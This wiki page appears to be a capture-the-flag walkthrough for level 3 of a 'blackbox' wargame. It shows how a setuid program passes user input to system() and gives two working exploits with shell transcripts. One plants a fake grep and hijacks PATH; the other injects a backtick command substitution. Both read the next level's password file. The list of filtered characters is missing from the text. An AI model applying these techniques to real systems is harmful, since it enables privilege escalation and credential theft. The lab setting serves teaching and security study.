MRL WikiMain Page | About | Help | FAQ | Special pages | Log in

Printable version | Disclaimers | Privacy policy

Level 3

From MRL Wiki - level 3

Spoilers Below

The proclist binary accepts an argument from stdin, which is appended to a string that is passed as an argument to system().

10: std::cin >> program;
21: command = "/bin/ps |grep ";
22: command += program;
23: system(command.c_str());
The tricky part is a rudimentary character filter, which successfully filters out any of the following characters:

There turned out to be multiple ways to accomplish this level, and there are probably further variations on the examples below.

level3@blackbox:/tmp/tyler3$ cat > grep
/bin/cat /home/level4/password
level3@blackbox:/tmp/tyler3$ chmod a+x ./grep
level3@blackbox:/tmp/tyler3$ export PATH=.
level3@blackbox:/tmp/tyler3$ ~/proclist
Enter the name of the program: a
<password displays>
level3@blackbox:/tmp/tyler3$ touch password
level3@blackbox:/tmp/tyler3$ chmod 777 password
level3@blackbox:/tmp/tyler3$ cat > getpass
cat /home/level4/password > /tmp/tyler3/password
level3@blackbox:/tmp/tyler3$ chmod a+x getpass
level3@blackbox:/tmp/tyler3$ ~/proclist
Enter the name of the program: `./getpass`
Usage: grep [OPTION]... PATTERN [FILE]...
Try `grep --help' for more information.
level3@blackbox:/tmp/tyler3$ cat password
<password displays>

Retrieved from ""

This page has been accessed 1,672 times. This page was last modified on 5 September 2008, at 18:14.


Main Page
Community portal
Current events
Recent changes
Random page
Edit this page
Editing help
This page
Discuss this page
New section
Printable version
Page history
What links here
Related changes
My pages
Log in / create account
Special pages
New pages
File list